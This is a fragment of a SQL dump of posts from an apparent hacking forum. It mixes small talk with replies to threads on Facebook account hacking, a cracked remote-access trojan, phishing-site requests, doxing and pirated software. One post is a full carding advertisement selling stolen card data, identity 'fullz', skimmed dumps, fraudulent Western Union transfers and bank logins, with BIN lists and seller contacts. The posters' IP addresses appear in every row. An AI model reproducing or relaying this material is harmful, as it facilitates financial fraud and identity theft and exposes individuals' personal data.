'84ced20cc3dbcef4937965b3964a7cb4', '0', '0'); INSERT INTO mybb_posts VALUES('505', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '55', 'Baws', '1345529809', '5 views and no replies, I\'ll be the first.\n\nIt sure has lots of useful information, but we\'ll need more topics.\n\nAs much as I wanna share what I know, I think most of what I know is known and easily found/learned with Google.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '5e9e7a04d0c8f4f0cca9337dd728253d', '0', '0'); INSERT INTO mybb_posts VALUES('506', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '55', 'Baws', '1345529908', 'Thanks for the tutorial, I\'ve tried it before and failed tho. >.<', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'fe81f385d516551f9f213c58db3c974f', '0', '0'); INSERT INTO mybb_posts VALUES('507', '168', '0', '50', ':(', '0', '54', 'Sin Cara', '1345533202', 'i just demoted to basic......\r\nand the sad thing is that i just trusted admin and he did not:(', '119.154.95.168', '2006605736', '1', '0', '0', '0', '1', '6e800dd231bf0c8f545523738cbf1503', '0', '0'); INSERT INTO mybb_posts VALUES('508', '161', '469', '3', 'RE: Congratz NXK', '0', '62', 'R?????zo?', '1345536342', 'Congratz on the promotion bro :)', '46.50.87.75', '775051083', '1', '0', '0', '0', '1', 'de636ef294e8f662128655ec926efa81', '0', '0'); INSERT INTO mybb_posts VALUES('509', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '62', 'R?????zo?', '1345536609', 'Of course it has advantages, even though we are just starting the forum and we need alot more people (upgraded aswell) so we get more useful stuff in here.', '46.50.87.75', '775051083', '1', '0', '0', '0', '1', '9b168ca6c1c5f76ed74e0d34a3b21c8a', '0', '0'); INSERT INTO mybb_posts VALUES('510', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '62', 'R?????zo?', '1345536723', 'Thanks for sharing, why didn\'t I knew that on my school times :P', '46.50.87.75', '775051083', '1', '0', '0', '0', '1', '030548f953a22616dd5fedf6a656fb09', '0', '0'); INSERT INTO mybb_posts VALUES('518', '142', '369', '30', 'RE: Blackshades RAT 5.0 Cracked', '0', '67', 'HoverCatz', '1345554308', 'No idea. My computer havent found it yet if its infected :3', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b0d91ac1a9856387c90fd733cc3f1156', '0', '0'); INSERT INTO mybb_posts VALUES('519', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345554314', 'I came here from t3h jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =]', '24.212.197.164', '416597412', '1', '0', '82', '1348618644', '1', 'b137bc89baacf4c10d01bacb06c98860', '0', '1348618644'); INSERT INTO mybb_posts VALUES('521', '31', '86', '7', 'RE: How long are you online daily?', '0', '82', 'iTzIpod', '1345554500', 'I\'ll try my best to post a lot and be active on this forum. I connected to this forum yesterday and was having problems with the email confirmation. I tried resending it a couple times and didn\'t recieve anything from LH. \n\n\nSo far I spent 1 hour and got like 4 posts? I think', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '32c581cb060f6c764e2b35e5cf619e36', '0', '0'); INSERT INTO mybb_posts VALUES('522', '59', '145', '42', 'RE: 13 year old visits jail for hacking', '0', '82', 'iTzIpod', '1345554867', 'OMG I remember that show. It was like the best :p\nOT: It is a program. And it is a good thing he stopped.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79ade4149b891652f265126391474815', '0', '0'); INSERT INTO mybb_posts VALUES('523', '158', '464', '42', 'RE: So ninja\'s DO exist?!', '0', '82', 'iTzIpod', '1345555006', '[quote=\'t3h jok3r\' pid=\'464\' dateline=\'1345498572\']\r\nI thought Ninja\'s were just a story to promote Karate, Martial Arts etc. From this I do believe they exist but if they do then I don\'t think he is the last one.\r\n[/quote]\r\n\r\nI thought the same thing! \r\n\r\n\r\nNinja\'s are cool though :p\r\nI\'m one.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f9569034dfb16d9fdb9e3a9551b3ef80', '0', '0'); INSERT INTO mybb_posts VALUES('524', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '82', 'iTzIpod', '1345555125', 'Wow. I wonder who was 2nd place. Did that person get the medal?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f7003b3e792f7fd3f6455145966da7b', '0', '0'); INSERT INTO mybb_posts VALUES('525', '134', '341', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345555390', 'I will try my best to refer HQ and active people. =]\n\nThis forum already does contain HQ and active people.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9434d6e85adf097ee372cc3c83d9587', '0', '0'); INSERT INTO mybb_posts VALUES('526', '167', '501', '4', 'RE: iTzIpod is here (:', '0', '82', 'iTzIpod', '1345555457', '[quote=\'Baws\' pid=\'501\' dateline=\'1345529514\']\r\nHi Ryan, or Jacob?\r\n\r\nWelcome on here, I got a ps3 too and msg me if you want so I can add you!\r\n\r\nPSN: Rest_In_Peace911\r\n[/quote]\r\n\r\nAlright bro. I\'ll add you! :D\r\n\r\nAnd thanks for the warm welcome! <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ac558fa64e11a0d05fe5b103a56439e', '0', '0'); INSERT INTO mybb_posts VALUES('527', '166', '493', '49', 'RE: New userbars?', '0', '1', 't3h jok3r', '1345555500', 'I agree with iTzIpod, we can\'t go ahead unless we get an idea of your friends work. I agree some of the userbars are simple and a change might be great.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '30e3a8230105fc065ea9f19a06bb22ed', '0', '0'); INSERT INTO mybb_posts VALUES('528', '171', '0', '8', 'What Genre do you listen to?', '0', '82', 'iTzIpod', '1345555795', 'Hey LH. \r\nThis thread is simple. You just post here saying what Genre of Music do you listen to.\r\n\r\nI listen to Kpop, Hip Hop, Rap, Dubstep, and Techno.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '121464a20edba73380e25dceae211a51', '0', '0'); INSERT INTO mybb_posts VALUES('529', '168', '507', '50', 'RE: :(', '0', '1', 't3h jok3r', '1345555861', 'This was meant to be in the [b]complaints[/b] section but since you made it public, I will let the whole community know why I demoted you. You always acted like a butthead, Hil and many other staff members disliked you for your language but still I gave you two chances. Reason for the demotion in the image below.\n\n[img]http://img256.imageshack.us/img256/8249/sink.png[/img]\n\nSo I don\'t think you should be so surprised on your demotion.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'b54e1d2e837514140346ec2c7a5f47d2', '0', '0'); INSERT INTO mybb_posts VALUES('530', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '82', 'iTzIpod', '1345555945', 'May I have a copy of this eBook please? I am an Elite member (Upgraded).\n\nThanks. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f7031e00eac25e386ae6eb7f7d015227', '0', '0'); INSERT INTO mybb_posts VALUES('531', '165', '492', '5', 'RE: Just did something', '0', '1', 't3h jok3r', '1345556073', 'That\'s a brilliant idea. If you are busy, I can sign up and post on your friends website. This would help out website a lot, but it kinda depends on what kind of website it is. \n\nThanks for asking your friend about LH.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '2b49caad17f9c83b293bd6180cefff58', '0', '0'); INSERT INTO mybb_posts VALUES('532', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '82', 'iTzIpod', '1345556144', 'Is it me or the Chrome Link doesn\'t work?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f3fc48a8d3f6155962711d8ebfcdbc2b', '0', '0'); INSERT INTO mybb_posts VALUES('533', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '1', 't3h jok3r', '1345556174', 'Welcome to L33t Hacking Jacob.\n\nMan, I think I\'m the only one who has a PS3 and doesn\'t have a PSN ID :(', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'ad24b727755f199e4368efd34422844b', '0', '0'); INSERT INTO mybb_posts VALUES('534', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '82', 'iTzIpod', '1345556275', 'I can\'t seem to click on that link. But, I just copied and pasted it onto my URL Link Box. And then clicked enter. After, I got a message saying:\nIt appears that you\'ve come from nowhere. You must click a link to get here, otherwise we won\'t let you continue.\n\n:/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7cdc232806452d7c1856b5bd9fd9f2d', '0', '0'); INSERT INTO mybb_posts VALUES('535', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '1', 't3h jok3r', '1345556286', 'I mostly like listening to Rap songs. Wait isn\'t rap and the hip hop the same thing.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'e3f9eb6e3dc20c1b511f89096fe13387', '0', '0'); INSERT INTO mybb_posts VALUES('536', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '82', 'iTzIpod', '1345556489', 'When I try to go on \nhttp://skype.hotspotshield.com/banner.php\nI get this message saying Temporarily Unavailable! :/', '24.212.197.164', '416597412', '1', '0', '82', '1345556738', '1', '9370316008f2d63ace496d1458bef34e', '0', '1345556738'); INSERT INTO mybb_posts VALUES('512', '170', '0', '19', '[Junk]Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs', '0', '6', 'gee4realbiz', '1345550226', 'Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs\r\n\r\n===============Prices For Cvv===============\r\n\r\n1 US (visa,master) = 3 $\r\n1 US (Amex,dis) = 4 $\r\n1 UK = 8 $\r\n1 UK (with DOB ) = 15 $\r\n1 Ca = 10 $\r\n1 CA (Amex,dis) = 15 $\r\n1 EU = 15 $\r\n1 EU (Amex,dis) = 17 $\r\n1 US (full info) = 15 $\r\n1 UK (full info) = 30$\r\nAustralia (AU) = 10 $\r\nSwitzerland (VE) = 15 $\r\nFrance (FR) = 15 $\r\nGermany (GE) = 15 $\r\nMexico (MX) = 12 $\r\nNew Zealand (NZ) = 13 $\r\nITALY = 15 $\r\nAsian cvv(all country)=17$\r\nAnd many country orther...\r\n \r\n------------------------MASTER and VISA BIN-------------------------\r\n446278 - 446272 - 449352 - 449353 - 498824 - 415929 - 465902 - 492940\r\n492181 - 492182 - 492942 - 456735 - 454313 - 462785 - 453978\r\n518675 - 6759 - 5434 - 529930 - 552188 - 543429 - 5505\r\n \r\n-------------------Fullz INfos Formate-------------------------\r\n \r\nFirstName: ******\r\nLastLame: ***********\r\nAddress: ****************\r\nCity:********\r\nState: **\r\nEmail: **********t\r\nCardType: ******\r\nZipCode: *****\r\nCountry: *******\r\nSSN: ********\r\nDOB: ** ** ****\r\nMother Maiden Name: *********\r\nDriver License Number: *************H\r\nPhone: ********\r\nCardNumber: ***************\r\nE*piryDate: ** **\r\nCVV2: ***\r\nATM PIN: ****\r\n \r\n(3.)\r\nCC+Cvv2 ( Cvvs)\r\nFormate:\r\n \r\nFirstName: ******\r\nLastLame: ***********\r\nAddress: ****************\r\nCity:********\r\nState: **\r\nEmail: **********\r\nZipCode: *****\r\nCountry: *******\r\nPhone: ********\r\nCardNumber: ***************\r\nExpiryDate: ** **\r\nCVV2: ***\r\n\r\n===============Price For Dumps ===============\r\n\r\n==> Usa :101\r\n- Visa| MasterCard Classic | Standart = $12\r\n- Visa| MasterCard Gold | Platinum = $18\r\n- Visa| MasterCard Business | Corparate = $25\r\n- Visa| MasterCard Signature | Purchasing = $35\r\n- American Express = $12 ( WITHOUT SID )\r\n- Discover = $20\r\n\r\n\r\n==> Canada: 101 201\r\n- Visa| MasterCard Classic | Standart = $25\r\n- Visa| MasterCard Gold | Platinum = $30\r\n- Visa| MasterCard Business | Corparate = 40$\r\n\r\n\r\n==> EU, UK: 101 201\r\n- Classic | Standart = 60$\r\n- Gold/Platinum = 70$\r\n- Business/Signature/Purchase/Corporate/World = 100$\r\n\r\n\r\n==> Other countries: 101 201\r\n- MasterCard| Visa Classic = 50$\r\n- Visa Gold|Platinum|Corporate|Signature|Business = 70$\r\n==> ASIA/AUSTRALIA/Exotic: 101 201 121\r\n- MasterCard| Visa Classic - $50\r\n- Visa Gold|Platinum|Corporate|Signature|Business ? $70\r\n\r\n===============Visa Bins===============\r\n\r\n403496;VISA;PNC BANK, N.A.;DEBIT;BUSINESS;UNITED STATES\r\n\r\n403552;VISA;UNIVERSAL SAVINGS BANK LIMITED;CREDIT;CLASSIC;CYPRUS;CY;CYP;196;CYPRUS NICOSIA;\r\n\r\n403604;VISA;PARK NATIONAL BANK;CREDIT;CLASSIC;UNITED STATES;US;USA;840;\r\n\r\n438826;VISA;HSBC BANK NEVADA, N.A.;CREDIT;GOLD PREMIUM;UNITED STATES;US;USA;840;\r\n\r\n438876;VISA;66 FEDERAL CREDIT UNION;CREDIT;CLASSIC;UNITED STATES;US;USA;840;UNITED STATES OF AMERICA OKLAHOMA BARTLESVILLE;\r\n\r\n438932;VISA;CHELINDBANK;DEBIT;ELECTRON;RUSSIAN FEDERATION\r\n\r\n438989;VISA;SECURITY STATE BANK;DEBIT;CLASSIC;UNITED STATES;US;USA;840;HTTP:\r\n\r\n439039;VISA;;;;BRAZIL;BR;BRA;76;;\r\n\r\n439089;VISA;OJSC JSCB CONVERSBANK-MOSCOW;DEBIT;CLASSIC;RUSSIAN FEDERATION;RU;RUS;643;\r\n\r\n===============Mc Bins===============\r\n\r\n57020;VISA;UNIBANCO - UNIAO DE BANCOS BRASILEIROS S.A.;;;BRAZIL;BR;BRA;76;;\r\n\r\n58098;VISA;ISRAEL CREDIT CARDS LIMITED;CREDIT;BUSINESS;ISRAEL;IL;ISR;376;ISRAEL TEL AVIV;\r\n\r\n57998;VISA;BANQUE SAUDI FRANSI;DEBIT;CLASSIC;SAUDI ARABIA;SA;SAU;682;\r\n\r\n52371;VISA;SHANGHAI COMMERCIAL BANK LTD.;;;CHINA;CN;CHN;156;CHINA, HONG KONG KOWLOON;\r\n\r\n452433;VISA;THE TORONTO-DOMINION BANK;CREDIT;CLASSIC;CANADA;CA;CAN;124;;\r\n\r\n52538;VISA;ARAB BANK PLC;;;JORDAN;JO;JOR;400;\r\n452594;VISA;VJA;CREDIT;CLASSIC\r\n\r\n452943;VISA;FIRST MIDWEST BANK;DEBIT;PLATINUM;UNITED STATES;US;USA\r\n\r\n===============Prices For Wu Transfer===============\r\n\r\n(Eu,Uk,Asia,Canada,Us,France,Germany,Italy,Nigeria and very\r\n\r\neasy to cashout African) :\r\nPrice :\r\n\r\n- Price 100$ :=> 1500$ MTCN ( sender name + country sender )\r\n- Price 200$ :=> 3500$ MTCN ( sender name + country sender )\r\n- Price 300$ :=> 5500$ MTCN ( sender name + country sender )\r\n- Price 400$ :=> 8000$ MTCN ( sender name + country sender )\r\n- Price 500$ :=> 10000$ MTCN ( sender name + country sender )\r\n\r\n* Give me your western union info and payment me fee.\r\n\r\n* Then i will do transfer\'s for you, After about 15 min you\'ll have\r\nMTCN and sender name + Country Sender\r\n\r\n* Demo :\r\nName sender : Mark Bills\r\nMTCN : 3434304668 / 8973628030 (same name sender)\r\nAnd orther MTCN : 0448746596 + 3033978004 + 9035112719 .....and more..\r\n\r\n=============== Bank Login From Usa And Eu And Uk And Asia Is Avaiable ===============\r\n\r\nAVAILABLE BANK LOGIN :\r\nScotia OnLine\r\nWachovia\r\nnetbank.commbank.com.au\r\nAbbey\r\nHSBC\r\nBremer Online Banking\r\nFlagstar Bank\r\nKBC Bank\r\nEnterCard\r\nPostbank\r\nM&T\r\nCredit Union\r\nWaMu\r\nLandmark\r\nOrchard\r\nAmerican Express\r\nWells Fargo\r\nICICI Bank\r\nChase\r\nPen Air Federal\r\nU.S. Bank\r\nRBC\r\nFirst Trust Bank\r\nBanque Nationale\r\nHDFC Bank\r\n**You can contact me for more and many Bank Logins you need.\r\n\r\n---------------------------------Conditions of sale-------------------------\r\n\r\n ( read it before adding me in ur contact list! )\r\n\r\n1. Dumps are sent to you within 30mins after full payment for the order...\r\n\r\n2. According ur desire staff can be checked up during the moment of purchase.\r\n\r\n3. No consultations and advices how where and what for it\'s possible to take advantage of the given goods.\r\n\r\n4. No gifts, \"just for test\" etc. And I am very tired from beggars and children... do not need wasted my and ur time too..\r\n\r\n5. Payment methods: Liberty-Reserve, Western Union, MoneyGram\r\n\r\n\r\nContact Visa :\r\nICQ : 627287399\r\nMail : bestcarder4all@yahoo.com\r\nY!M : bestcarder4all', '173.254.206.157', '-1375809891', '0', '0', '0', '0', '1', 'ac0c386a1b7a24e395db4387e5f5ee72', '0', '0'); INSERT INTO mybb_posts VALUES('517', '166', '493', '49', 'RE: New userbars?', '0', '82', 'iTzIpod', '1345554230', 'The current userbars are alright. I can\'t pick a side since you haven\'t showed us any of your friend\'s work. \n\nMay we see some of his work?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdf9a0da512903161fa774501cdb3faa', '0', '0'); INSERT INTO mybb_posts VALUES('514', '168', '507', '50', 'RE: :(', '0', '82', 'iTzIpod', '1345554042', 'What were you demoted from? :/\n\nSorry for your loss. But what are you planning to do now?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6075a37fdf85ea4c572b7fdd09863438', '0', '0'); INSERT INTO mybb_posts VALUES('516', '170', '512', '19', '[Junk]Wu Transfer/Cvv/Skimmed Dumps/Bank Logins & Trfs', '0', '1', 't3h jok3r', '1345554199', 'This thread has been junked.', '41.174.12.163', '699272355', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('537', '141', '532', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '8', 'spacefish36', '1345556515', '[quote=\'iTzIpod\' pid=\'532\' dateline=\'1345556144\']\r\nIs it me or the Chrome Link doesn\'t work?\r\n[/quote]\r\n\r\nIt works for me. \r\n\r\n\r\n[quote=\'Baws\' pid=\'426\' dateline=\'1345341766\']\r\n[quote=\'t3h jok3r\' pid=\'420\' dateline=\'1345330757\']\r\n[quote=\'Baws\' pid=\'409\' dateline=\'1345328738\']\r\nThanks for the share, I\'ll try this out.\r\n\r\nAlright I got about 40 points ATM, lol.\r\n\r\nWhat sites do you suggest using?\r\n\r\nI got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay\r\n[/quote]\r\n\r\nAren\'t those 6?\r\n[/quote]\r\n\r\nWatch out guys, we gotta smartass over here.:D\r\n\r\nJust kidding babe, what happened is um...I accidentally pressed 7 instead of 6...:shy:\r\n[/quote]\r\n\r\nLol.', '41.174.21.43', '699274539', '0', '0', '0', '0', '1', 'e790d257f531a5b4e82d06d6f9864ebb', '0', '0'); INSERT INTO mybb_posts VALUES('538', '134', '525', '47', 'RE: Win $10 for referring people', '0', '8', 'spacefish36', '1345556658', '[quote=\'iTzIpod\' pid=\'525\' dateline=\'1345555390\']\r\nI will try my best to refer HQ and active people. =]\r\n\r\nThis forum already does contain HQ and active people.\r\n[/quote]\r\n\r\nThis site is active and building up everyday, hopefully this site gets popular and I believe we can only help T3h Jok3r make his website successful.', '41.174.21.43', '699274539', '0', '0', '0', '0', '1', '51a88eff50aca2c5eededd49068531ad', '0', '0'); INSERT INTO mybb_posts VALUES('539', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '82', 'iTzIpod', '1345556678', 'Ugh. I hate FileIce. Cant you just use MediaFire or Rapidshare or LocalHostr!?!?! :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca8f68bbf00e0b43a01eff65012d2b08', '0', '0'); INSERT INTO mybb_posts VALUES('540', '59', '522', '42', 'RE: 13 year old visits jail for hacking', '0', '8', 'spacefish36', '1345556778', '[quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\']\r\nOMG I remember that show. It was like the best :p\r\nOT: It is a program. And it is a good thing he stopped.\r\n[/quote]\r\n\r\nWhat program are you talking about?', '41.174.21.43', '699274539', '0', '0', '0', '0', '1', '120568cb72b2de4e40e9fb8da9a24dd1', '0', '0'); INSERT INTO mybb_posts VALUES('541', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '82', 'iTzIpod', '1345556827', 'May I give this a go?\nI want a Runescape Accounr Phisher.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68641440f4d50fb3def3e2306ee962e6', '0', '0'); INSERT INTO mybb_posts VALUES('542', '135', '345', '43', 'RE: Astro Pid [free4all] mediafire', '0', '82', 'iTzIpod', '1345556962', 'Yay! It works! <3 Thank you for releasing it. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a25cf0447ded46412def86dff7b268a', '0', '0'); INSERT INTO mybb_posts VALUES('543', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '5', 'Timmy', '1345557016', 'Welcome to LH Ryan. 18 posts in under a 1 hour, you are too HQ.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '33bea844e03fd9ddee30127d420d8068', '0', '0'); INSERT INTO mybb_posts VALUES('544', '172', '0', '3', 'Awards', '0', '5', 'Timmy', '1345557112', 'On the awards page, there is a special award for all upgraded members but I don\'t see any award on upgraded members.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', '64265f8243c0772c45b07d264c851d56', '0', '0'); INSERT INTO mybb_posts VALUES('545', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1345557147', 'There are a lot of advantages of being Elite other than Regular Member!\n\nBeing Elite is recommended and useful.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5538972375d7b6045b32a72acdaccc53', '0', '0'); INSERT INTO mybb_posts VALUES('546', '146', '375', '29', 'RE: se7en sins PREMIUM SECTION', '0', '82', 'iTzIpod', '1345557294', 'Thanks for the share. I\'m glad I am ELite because of this! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ae4dd5bde6c1dbf130083d08ffca915', '0', '0'); INSERT INTO mybb_posts VALUES('547', '172', '544', '3', 'RE: Awards', '0', '1', 't3h jok3r', '1345557465', 'Opps nice spot. Thanks for letting us know, the think is that I was too busy recently so I forgot about the award. I will be adding the awards right now, thanks once again.', '41.174.21.43', '699274539', '1', '0', '0', '0', '1', 'd0e717bc7cfdff21a58f1f9c8cb4bf52', '0', '0'); INSERT INTO mybb_posts VALUES('548', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '82', 'iTzIpod', '1345557524', 'ROFL that is hilarious. Although I don\'t hate anyone at the moment so...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '15cd3330be407280184346890cbc06b1', '0', '0'); INSERT INTO mybb_posts VALUES('549', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '82', 'iTzIpod', '1345557636', 'Seems legit! I will try it out later on today.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '433e53bd009aeedbcae6dfbbeaf3d5b9', '0', '0'); INSERT INTO mybb_posts VALUES('550', '2', '4', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1345557853', 'I never knew how to do that. Now I do! It is so cool. I will make a ton of Userbars. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5293c02f8cdf192cb12e3433e09d65f5', '0', '0'); INSERT INTO mybb_posts VALUES('551', '83', '196', '34', 'RE: [tut]How to make a thread design', '0', '82', 'iTzIpod', '1345557952', 'Very cool tutorial. I will make some thread designs later on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5818b81520df5f7412f6a397ecdc8a6c', '0', '0'); INSERT INTO mybb_posts VALUES('552', '138', '355', '35', 'RE: Make Cool Logo in just 20 sec....[HOT]', '0', '82', 'iTzIpod', '1345558150', 'It is easy and free and all. But I don\'t like them. I prefer to make my own and all.\n\nBut anyways,\n\nNice release!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f3132ef0129976ab1427538a719ca0b', '0', '0'); INSERT INTO mybb_posts VALUES('553', '168', '514', '50', 'RE: :(', '0', '54', 'Sin Cara', '1345558460', '[quote=\'iTzIpod\' pid=\'514\' dateline=\'1345554042\']\r\nWhat were you demoted from? :/\r\n\r\nSorry for your loss. But what are you planning to do now?\r\n[/quote]\r\n\r\nHmmmmmmmm...... Just planning for my MS admission :)\n[hr]\nAdmin please close this thread..\nand sorry for inconvenience!!', '119.154.75.152', '2006600600', '1', '0', '54', '1345559138', '1', 'b014ec8300d68b4ea52364af8d716e2e', '0', '1345559138'); INSERT INTO mybb_posts VALUES('554', '167', '494', '4', 'RE: iTzIpod is here (:', '0', '82', 'iTzIpod', '1345558818', '@Timmy, thanks for the welcome. But please call my Jacob :p\n\nAlso @t3h jok3r, thanks for the welcome. Also, LOL why don\'t you got a PSN ID? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bd8826148f0067301cc37fb3b60bedc1', '0', '0'); INSERT INTO mybb_posts VALUES('555', '171', '535', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1345559070', '[quote=\'t3h jok3r\' pid=\'535\' dateline=\'1345556286\']\r\nI mostly like listening to Rap songs. Wait isn\'t rap and the hip hop the same thing.\r\n[/quote]\r\n\r\nPeople say it is. People say it isn\'t :/ :?:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9114ae5796407e2b0f296053e2b15016', '0', '0'); INSERT INTO mybb_posts VALUES('556', '112', '530', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345559088', '[quote=\'iTzIpod\' pid=\'530\' dateline=\'1345555945\']\r\nMay I have a copy of this eBook please? I am an Elite member (Upgraded).\r\n\r\nThanks. =]\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'b2594c291f85561feb41facfcd768802', '0', '0'); INSERT INTO mybb_posts VALUES('557', '162', '476', '7', 'RE: Applying for that swag award ;)', '0', '82', 'iTzIpod', '1345559185', 'Lol. Congratulations on the swag award. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e99edd267646f0688983b0dcd1de9712', '0', '0'); INSERT INTO mybb_posts VALUES('558', '134', '538', '47', 'RE: Win $10 for referring people', '0', '82', 'iTzIpod', '1345559239', '[quote=\'spacefish36\' pid=\'538\' dateline=\'1345556658\']\r\n[quote=\'iTzIpod\' pid=\'525\' dateline=\'1345555390\']\r\nI will try my best to refer HQ and active people. =]\r\n\r\nThis forum already does contain HQ and active people.\r\n[/quote]\r\n\r\nThis site is active and building up everyday, hopefully this site gets popular and I believe we can only help T3h Jok3r make his website successful.\r\n[/quote]\r\n\r\nYes we can. And we will. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3719aad2030f5a037c93b77059fdc2a', '0', '0'); INSERT INTO mybb_posts VALUES('559', '141', '537', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '82', 'iTzIpod', '1345559339', '[quote=\'spacefish36\' pid=\'537\' dateline=\'1345556515\']\r\n[quote=\'iTzIpod\' pid=\'532\' dateline=\'1345556144\']\r\nIs it me or the Chrome Link doesn\'t work?\r\n[/quote]\r\n\r\nIt works for me. \r\n\r\n\r\n[quote=\'Baws\' pid=\'426\' dateline=\'1345341766\']\r\n[quote=\'t3h jok3r\' pid=\'420\' dateline=\'1345330757\']\r\n[quote=\'Baws\' pid=\'409\' dateline=\'1345328738\']\r\nThanks for the share, I\'ll try this out.\r\n\r\nAlright I got about 40 points ATM, lol.\r\n\r\nWhat sites do you suggest using?\r\n\r\nI got 7 tabs right now, yahoo-msn-milliondollarhomepage-youtube-aol-ebay\r\n[/quote]\r\n\r\nAren\'t those 6?\r\n[/quote]\r\n\r\nWatch out guys, we gotta smartass over here.:D\r\n\r\nJust kidding babe, what happened is um...I accidentally pressed 7 instead of 6...:shy:\r\n[/quote]\r\n\r\nLol.\r\n[/quote]\r\n\r\nOh alright. It works now.\r\nBefore, it just said loading. And the URL Link was about:blank', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '94b7ee5f3bcbd69c223aba1e5717801b', '0', '0'); INSERT INTO mybb_posts VALUES('560', '138', '355', '35', 'RE: Make Cool Logo in just 20 sec....[HOT]', '0', '54', 'Sin Cara', '1345559377', 'You are Welcome Bro :) ;) :)', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'ce45a511818d083d982592a9d1e97e76', '0', '0'); INSERT INTO mybb_posts VALUES('561', '59', '540', '42', 'RE: 13 year old visits jail for hacking', '0', '82', 'iTzIpod', '1345559517', '[quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\']\r\n[quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\']\r\nOMG I remember that show. It was like the best :p\r\nOT: It is a program. And it is a good thing he stopped.\r\n[/quote]\r\n\r\nWhat program are you talking about?\r\n[/quote]\r\n\r\nBeyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in.\r\nI don\'t know how to explain it. But if you watch the show, then you would notice it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd53d2907f5915ad9126e09cfa7cc1116', '0', '0'); INSERT INTO mybb_posts VALUES('562', '104', '442', '33', 'RE: Photoshop vs Gimp', '0', '82', 'iTzIpod', '1345559836', '[quote=\'unixmoon\' pid=\'442\' dateline=\'1345419493\']\r\nOh OK. So which version of photoshop should I use?\r\n[/quote]\r\n\r\nYou can use whichever one you want. I can give you a download link of CS3 or CS4. I use Photoshop CS4. But Photoshop CS6 is the latest version which I don\'t have. I also don\'t have CS5 too.. Sorry.\r\n\r\nBut still if you want, I will give you the download link to Adobe Photoshop CS3 or CS4.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b805caa1e85a44cebc60845c877cab7f', '0', '0'); INSERT 